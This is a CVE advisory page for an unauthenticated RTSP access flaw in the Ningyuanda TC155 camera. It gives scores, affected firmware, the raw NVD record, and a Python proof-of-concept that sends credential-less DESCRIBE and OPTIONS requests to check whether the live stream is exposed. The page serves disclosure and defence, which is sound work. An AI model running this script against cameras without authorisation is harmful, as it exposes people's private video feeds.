Security Vulnerability Report
CVE-2025-14746 CVSS 4.3 MEDIUM

CVE-2025-14746

Published: 2025-12-16 03:15:57
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Ningyuanda TC155 57.0.2.0. The affected element is an unknown function of the component RTSP Live Video Stream Endpoint. Such manipulation leads to improper authentication. The attack must be carried out from within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
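CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Note: the score shown here is the record's Secondary CVSS 3.1 assessment. The raw JSON record on this page also carries a Primary CVSS 3.1 assessment of 6.5 MEDIUM (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N), which rates the confidentiality impact as HIGH; triage against the higher figure when exposed camera footage is sensitive.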

Configurations (Affected Products)

cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:* - NOT VULNERABLE
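Ningyuanda TC155 firmware < 57.0.2.0 (note: the CVE description and the CPE match above name firmware 57.0.2.0 itself as the vulnerable release, so treat 57.0.2.0 as affected as well)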

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
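#!/usr/bin/env python3
"""Exposure check for CVE-2025-14746 (Ningyuanda TC155, RTSP improper authentication).

The script sends RTSP DESCRIBE and OPTIONS requests that carry no
Authorization header and reports whether the device answers them.

Affected product: Ningyuanda TC155. The CVE record on this page names
firmware 57.0.2.0; the page summary also says "< 57.0.2.0".
Attack vector: adjacent network (AV:A). Privileges required: none (PR:N).
Weakness class per the CVE record: CWE-287.

Reading the result:
  * A confirmed finding means the RTSP endpoint described a stream to a
    client that presented no credentials.
  * The page names no fixed firmware and says the vendor did not respond,
    so the practical mitigation is to limit which hosts can reach the RTSP
    port (segmentation / ACLs) or to disable the RTSP service.
  * For detection, look for RTSP DESCRIBE requests without an Authorization
    header that the camera answers with a success status.
"""
import socket
import sys

RTSP_TIMEOUT_SECONDS = 10
RECV_CHUNK_BYTES = 4096
HEADER_TERMINATOR = b"\r\n\r\n"


def send_rtsp_request(host, port, request):
    """Send one RTSP request over TCP and return the decoded reply.

    Args:
        host: IPv4 address or host name of the device.
        port: TCP port of the RTSP service.
        request: Complete RTSP request text, including the blank line.

    Returns:
        The reply decoded as UTF-8 (undecodable bytes dropped), or a string
        starting with "Error: " when the exchange could not be completed.
        Reading stops as soon as the header terminator has been seen, on a
        receive timeout, or when the peer closes, so a body that follows the
        headers may be incomplete.
    """
    try:
        # The context manager closes the socket on every path; the previous
        # version leaked it whenever connect/send raised.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(RTSP_TIMEOUT_SECONDS)
            sock.connect((host, port))

            # sendall() retries short writes; send() may transmit only part
            # of the request.
            sock.sendall(request.encode('utf-8'))

            response = b''
            while HEADER_TERMINATOR not in response:
                try:
                    chunk = sock.recv(RECV_CHUNK_BYTES)
                except socket.timeout:
                    break
                if not chunk:
                    break
                response += chunk

        return response.decode('utf-8', errors='ignore')
    except Exception as e:
        # Reporting boundary: callers expect an "Error: ..." string rather
        # than an exception.
        return f"Error: {str(e)}"


def exploit_rtsp_bypass(target_ip, rtsp_port=554):
    """Check whether the RTSP endpoint answers requests without credentials.

    Args:
        target_ip: Address of the device to check.
        rtsp_port: TCP port of the RTSP service (default 554).

    Returns:
        True when the unauthenticated DESCRIBE was confirmed as answered,
        False otherwise. (The previous version returned True unconditionally,
        which made the result useless to any caller that inspected it.)
    """
    print(f"[*] Target: {target_ip}:{rtsp_port}")
    print(f"[*] Testing CVE-2025-14746: RTSP Authentication Bypass")

    # Check 1: DESCRIBE without an Authorization header.
    describe_request = (
        f"DESCRIBE rtsp://{target_ip}/stream1 RTSP/1.0\r\n"
        f"CSeq: 1\r\n"
        f"Accept: application/sdp\r\n"
        f"\r\n"
    )

    print("\n[1] Sending DESCRIBE request without authentication...")
    response = send_rtsp_request(target_ip, rtsp_port, describe_request)

    # NOTE(review): the positive test also requires the literal text
    # "DESCRIBE" somewhere in the reply. A reply that lacks it is reported as
    # not confirmed, so treat a negative result as inconclusive rather than
    # as proof that authentication is enforced.
    describe_confirmed = '200 OK' in response and 'DESCRIBE' in response

    if describe_confirmed:
        print("[+] VULNERABLE: DESCRIBE request succeeded without authentication")
        print("\n[+] RTSP Response:")
        print(response[:1000])

        # An SDP session description starts with a "v=" line.
        if 'v=' in response:
            print("\n[+] Video stream information obtained:")
            print("    The attacker can now access live video feed without credentials")
    elif response.startswith("Error: "):
        # Keep "could not reach the service" apart from "service refused us";
        # the two call for different follow-up.
        print(f"[-] DESCRIBE check could not be completed: {response}")
    else:
        print("[-] DESCRIBE request failed or requires authentication")

    # Check 2: OPTIONS without an Authorization header.
    options_request = (
        f"OPTIONS rtsp://{target_ip}/stream1 RTSP/1.0\r\n"
        f"CSeq: 2\r\n"
        f"\r\n"
    )

    print("\n[2] Sending OPTIONS request without authentication...")
    response2 = send_rtsp_request(target_ip, rtsp_port, options_request)

    if '200 OK' in response2:
        print("[+] OPTIONS request succeeded")
        if 'Public:' in response2:
            print("[+] Available methods:", end=" ")
            for line in response2.split('\r\n'):
                if 'Public:' in line:
                    print(line.split('Public:')[1].strip())

    return describe_confirmed


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [rtsp_port]")
        print(f"Example: {sys.argv[0]} 192.168.1.100 554")
        sys.exit(1)

    target = sys.argv[1]
    try:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
    except ValueError:
        # A non-numeric port used to end in a traceback.
        print(f"Usage: {sys.argv[0]} <target_ip> [rtsp_port]")
        sys.exit(1)

    exploit_rtsp_bypass(target, port)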

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14746", "sourceIdentifier": "[email protected]", "published": "2025-12-16T03:15:57.233", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Ningyuanda TC155 57.0.2.0. The affected element is an unknown function of the component RTSP Live Video Stream Endpoint. Such manipulation leads to improper authentication. The attack must be carried out from within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 3.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC8CEF63-8B37-4D17-8C31-4BD41E7B8D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DC27CA3-9706-448B-8C91-E413B1F05656"}]}]}], "references": [{"url": "https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-RTSP.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336519", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336519", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707195", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}